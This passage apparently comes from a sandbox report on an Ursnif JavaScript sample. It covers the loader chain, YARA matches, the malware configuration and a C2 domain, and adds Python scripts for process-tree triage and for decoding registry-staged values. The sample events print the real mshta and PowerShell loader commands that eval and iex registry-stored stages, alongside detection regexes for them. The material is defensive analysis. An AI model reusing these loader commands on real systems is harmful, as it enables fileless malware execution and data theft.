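The process-creation lines above describe a loader chain that is easy to miss if each event is judged on its own (regsvr32.exe, mshta.exe, control.exe and powershell.exe are all legitimate binaries) but stands out when the parent/child relationship and the command-line shape are checked together: a script host launching regsvr32.exe -s on a .txt file in the user's Temp directory, regsvr32.exe launching mshta.exe with an inline HTA that RegReads its next stage, that mshta.exe launching powershell.exe which iex's a decoded registry value, and regsvr32.exe also starting control.exe /? as an injection target. The triage script below is an added example written for this page, not tooling from the report or from Joe Sandbox. It assumes a generic process-creation schema (pid, ppid, image, cmdline) such as Sysmon event 1 or EDR telemetry provides; the events are constructed from the command lines shown above, with PIDs 3064 (regsvr32.exe) and 4740 (control.exe) taken from the report and the remaining PIDs invented.

```python
"""Process-tree triage for the registry-resident loader chain in this report.

Added example, not part of the Joe Sandbox report. The event schema
(pid, ppid, image, cmdline) is an assumed generic one such as Sysmon event 1
provides; SAMPLE_EVENTS is constructed from the command lines in the report.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed events. PIDs 3064 (regsvr32.exe) and 4740 (control.exe) come
# from the report; the other PIDs and the wscript.exe invocation are invented.
SAMPLE_EVENTS = [
    ProcEvent(1000, 900, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(1100, 1000, r"C:\Windows\System32\wscript.exe",
              r'wscript.exe "C:\Users\user\Desktop\job_attach_t9o.js"'),
    ProcEvent(3064, 1100, r"C:\Windows\System32\regsvr32.exe",
              r"'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\ZyQNToG.txt"),
    ProcEvent(4400, 3064, r"C:\Windows\System32\mshta.exe",
              r"""'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'"""),
    ProcEvent(4740, 3064, r"C:\Windows\System32\control.exe",
              r"C:\Windows\system32\control.exe /?"),
    ProcEvent(3380, 4400, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"""'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))"""),
    # Benign control case: a normal silent DLL registration from System32.
    ProcEvent(5000, 1000, r"C:\Windows\System32\regsvr32.exe",
              r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"),
]

SILENT_ARG = re.compile(r"(?i)[-/]s\s+[\"']?([^\"']+)")
USER_WRITABLE = re.compile(r"(?i)\\(users\\[^\\]+\\appdata|programdata|windows\\temp)\\")


def _name(path):
    """Lower-cased image file name without its directory."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(ev, by_pid):
    """Return (rule, detail) findings for one process-creation event."""
    name, cmd = _name(ev.image), ev.cmdline
    parent = by_pid.get(ev.ppid)
    pname = _name(parent.image) if parent else ""
    hits = []
    if name == "regsvr32.exe":
        m = SILENT_ARG.search(cmd)
        if m:
            target = m.group(1).strip()
            ext = target.rsplit(".", 1)[-1].lower() if "." in target else ""
            # Silent registration of a non-DLL extension from a user-writable path.
            if USER_WRITABLE.search(target) and ext not in ("dll", "ocx", "ax"):
                hits.append(("regsvr32_silent_nondll", target))
        if pname in ("wscript.exe", "cscript.exe"):
            hits.append(("regsvr32_from_script_host", pname))
    elif name == "mshta.exe":
        if re.search(r"(?i)about:<hta|javascript:|vbscript:", cmd):
            hits.append(("mshta_inline_hta", "script body passed on the command line"))
        if re.search(r"(?i)\bRegRead\s*\(", cmd):
            hits.append(("mshta_regread_stage", "next stage read from the registry"))
    elif name == "powershell.exe":
        has_iex = re.search(r"(?i)\b(iex|invoke-expression)\b", cmd)
        has_reg = re.search(r"(?i)\b(gp|get-itemproperty)\b[^)]*HKCU:", cmd)
        if has_iex and has_reg:
            hits.append(("powershell_iex_registry_value", "executes a decoded registry value"))
        if pname == "mshta.exe":
            hits.append(("powershell_from_mshta", pname))
    elif name == "control.exe" and pname == "regsvr32.exe":
        hits.append(("control_spawned_by_regsvr32", "unusual parent; injection target"))
    return hits


def ancestry(ev, by_pid):
    """Image names from the root of the known tree down to ev."""
    chain, seen = [], set()
    while ev is not None and ev.pid not in seen:
        seen.add(ev.pid)
        chain.append(_name(ev.image))
        ev = by_pid.get(ev.ppid)
    return list(reversed(chain))


def triage(events):
    """Map pid -> {"chain": [...], "hits": [...]} for every event with findings."""
    by_pid = {e.pid: e for e in events}
    report = {}
    for e in events:
        hits = check_event(e, by_pid)
        if hits:
            report[e.pid] = {"chain": ancestry(e, by_pid), "hits": hits}
    return report


if __name__ == "__main__":
    for pid, r in triage(SAMPLE_EVENTS).items():
        print(pid, " -> ".join(r["chain"]))
        for rule, detail in r["hits"]:
            print("    ", rule, ":", detail)
```

The benign regsvr32.exe event is included to show that the first rule keys on the combination of a user-writable path and a non-DLL extension, not on regsvr32.exe -s by itself; the ancestry walk is what turns four individually plausible events into one chain worth escalating.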
May try to detect the Windows Explorer process (often used for injection)
Source: regsvr32.exe, 00000003.00000002.1231089131.0000000001840000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.1233989902.0000000002D40000.00000002.00000001.sdmp, control.exe, 0000000F.00000002.1277361914.000001C7C6990000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1256681400.0000000001170000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 00000003.00000002.1231089131.0000000001840000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.1233989902.0000000002D40000.00000002.00000001.sdmp, control.exe, 0000000F.00000002.1277361914.000001C7C6990000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1256681400.0000000001170000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: regsvr32.exe, 00000003.00000002.1231089131.0000000001840000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.1233989902.0000000002D40000.00000002.00000001.sdmp, control.exe, 0000000F.00000002.1277361914.000001C7C6990000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1256681400.0000000001170000.00000002.00000001.sdmp | Binary or memory string: hProgram ManagerWE
Source: regsvr32.exe, 00000003.00000002.1231089131.0000000001840000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.1233989902.0000000002D40000.00000002.00000001.sdmp, control.exe, 0000000F.00000002.1277361914.000001C7C6990000.00000002.00000001.sdmp, explorer.exe, 00000010.00000002.1256681400.0000000001170000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: explorer.exe, 00000010.00000002.1248819501.0000000000A30000.00000004.00000020.sdmp | Binary or memory string: Progman{
Source: explorer.exe, 00000010.00000002.1248819501.0000000000A30000.00000004.00000020.sdmp | Binary or memory string: PProgmancci\Ap
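The mshta.exe and powershell.exe command lines earlier in this section never touch a file for their later stages: the HTA RegReads the Analager value and PowerShell iex's the ASCII decoding of the REG_BINARY value BingckDS, both under HKCU\Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9. On an infected profile the quickest way to recover those stages is to export the key with reg.exe and decode the values offline. The parser below is an added example written for this page, not tooling from the report or from Joe Sandbox. SAMPLE_REG is constructed: the key path is the one the command lines above read from, but the value bodies are harmless placeholder scripts standing in for the real stages, and the value "Stage" is invented to show a non-binary value being left alone.

```python
"""Offline decoding of registry-staged script values from a .reg export.

Added example, not tooling from the report. SAMPLE_REG is constructed: the
key path matches the command lines in the report, the value contents are
harmless placeholders (real stages would be the HTA/PowerShell scripts).
"""
import re

URSNIF_KEY = (r"HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft"
              r"\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9")

# Constructed export in the shape `reg export <key> stage.reg` writes:
# REG_BINARY as comma-separated hex bytes, long values wrapped with a
# trailing backslash, DWORDs as "dword:" followed by eight hex digits.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9]
"Analager"=hex:77,69,6e,64,6f,77,2e,66,6c,61,67,3d,31,3b
"BingckDS"=hex:57,72,69,74,65,2d,48,6f,73,74,20,27,\
  73,74,61,67,65,27
"Stage"=dword:00000002
"""

VALUE_LINE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def load_reg_file(path):
    """Read a file written by reg.exe export (UTF-16LE with BOM)."""
    with open(path, encoding="utf-16") as fh:
        return fh.read()


def _parse_value(raw):
    """Decode one value payload: quoted string, dword, or hex / hex(N) bytes."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    if raw.lower().startswith("dword:"):
        return int(raw[6:], 16)
    m = re.match(r"(?i)^hex(?:\((\d+)\))?:(.*)$", raw)
    if m:
        return bytes(int(h, 16) for h in m.group(2).split(",") if h.strip())
    return raw  # unknown encoding: keep the raw text for manual review


def parse_reg_export(text):
    """Parse .reg text into {key_path: {value_name: bytes | str | int}}."""
    keys, current = {}, None
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        # A trailing backslash continues a hex value on the next line.
        while line.endswith("\\") and i < len(lines):
            line = line[:-1] + lines[i].strip()
            i += 1
        m = VALUE_LINE.match(line)
        if not m or current is None:
            continue
        name = m.group(1) if m.group(1) is not None else "(Default)"
        keys[current][name] = _parse_value(m.group(2))
    return keys


def recover_scripts(keys):
    """Return {(key, value): text} for binary values that are printable ASCII,
    i.e. the form [System.Text.Encoding]::ASCII.GetString() would turn into a
    runnable script."""
    out = {}
    for key, values in keys.items():
        for name, data in values.items():
            if isinstance(data, bytes) and data and all(
                    0x20 <= b < 0x7F or b in b"\r\n\t" for b in data):
                out[(key, name)] = data.decode("ascii")
    return out


if __name__ == "__main__":
    for (key, name), script in recover_scripts(parse_reg_export(SAMPLE_REG)).items():
        print(f"{key}\\{name}:")
        print("   ", script)
```

On a live host the export step is `reg export "HKCU\Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9" stage.reg`, after which load_reg_file feeds the parser; the GUID subkey name is sample-specific, so in practice enumerate the subkeys of HKCU\Software\AppDataLow\Software\Microsoft rather than hard-coding it. Values that decode to non-ASCII bytes are left in recover_scripts' input untouched, which is deliberate: a later stage may be a packed PE or a compressed blob rather than script text.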

Language, Device and Operating System Detection:

Contains functionality to query locale information (e.g. system language)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_733C10EC GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_004D39DF cpuid
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (5 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (6 occurrences)
Contains functionality to create pipes for IPC
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AA4134 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError
Contains functionality to query local / system time
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_733C1C57 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,LdrInitializeThunk,MapViewOfFile,GetLastError,CloseHandle,GetLastError
Contains functionality to query the account / user name
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_004D39DF GetUserNameW,GetUserNameW,HeapFree,HeapFree
Contains functionality to query windows version
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_733C17E2 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError
Queries the cryptographic machine GUID
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.1064584505.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1107254349.0000000004D5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1235424292.0000000004AA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064674452.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064703086.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064524352.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.1207232988.000001C7C63B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064632588.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064218194.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1276679333.000000000033E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1190242494.0000000000700000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064435714.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064335431.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 3064, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 4740, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.1064584505.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1107254349.0000000004D5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1235424292.0000000004AA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064674452.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064703086.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064524352.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.1207232988.000001C7C63B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064632588.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064218194.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1276679333.000000000033E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1190242494.0000000000700000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064435714.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064335431.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 3064, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 4740, type: MEMORY

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_17134_x64", "version": "250137", "uptime": "318", "system": "1ce5daae129a99d4ae35102f58b42ad9hh", "size": "200780", "crc": "2", "action": "00000000", "id": "2000", "time": "1587610402", "user": "31b341dd54c8a3b79c4b2eb50a222cb3", "hash": "0x0d8e127a", "soft": "3"}

Behavior Graph

Behavior Graph ID: 224563 | Sample: job_attach_t9o.js | Start date: 22/04/2020 | Architecture: WINDOWS | Score: 100
(The graph is rendered as an image in the original report; only its node and edge text is recoverable here.)
DNS/IP Info: api10.dianer.at
Signatures on the sample node: Multi AV Scanner detection for domain / URL; Found malware configuration; Yara detected Ursnif; 7 other signatures
Process tree:
  wscript.exe (started from the sample)
    Created file: C:\Users\user\AppData\Local\...\ZyQNToG.txt, PE32 (dropped)
    Signatures: Benign windows process drops PE files; JScript performs obfuscated calls to suspicious functions
    regsvr32.exe (started by wscript.exe)
      regsvr32.exe (graph text cut off in the source at this node)
  iexplore.exe (started from the sample)
    iexplore.exe (3 instances, started by iexplore.exe)